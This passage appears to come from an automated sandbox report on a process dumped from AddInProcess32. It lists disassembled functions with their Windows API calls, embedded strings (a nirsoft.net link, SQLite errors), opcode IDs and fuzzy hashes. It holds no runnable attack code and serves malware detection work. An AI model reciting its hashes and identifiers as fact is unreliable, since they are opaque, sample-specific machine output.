                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                  Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf
                                                                                                  • String ID: %%0.%df
                                                                                                  • API String ID: 3473751417-763548558
                                                                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                  Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                  • String ID: A
                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                  Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 973020956-4135340389
                                                                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                  Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                  Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                  • String ID: \systemroot
                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                  Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                  • String ID: 0$6
                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                  Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 290601579-0
                                                                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                  Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                  Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                  • String ID: %s (%s)$YV@
                                                                                                  • API String ID: 3979103747-598926743
                                                                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                  Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                  • API String ID: 2780580303-317687271
                                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                  Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                  • API String ID: 2767993716-572158859
                                                                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                  Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpymemset
                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                  • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                  • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                  Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                  • String ID:
                                                                                                  • API String ID: 3015003838-0
                                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                  Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                  • free.MSVCRT ref: 004185AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2802642348-0
                                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                  Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                  • String ID: strings
                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                  Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                  • String ID: sysdatetimepick32
                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                  Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memset
                                                                                                  • String ID: -journal$-wal
                                                                                                  • API String ID: 438689982-2894717839
                                                                                                  • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                  • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                  Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                  Memory Dump Source
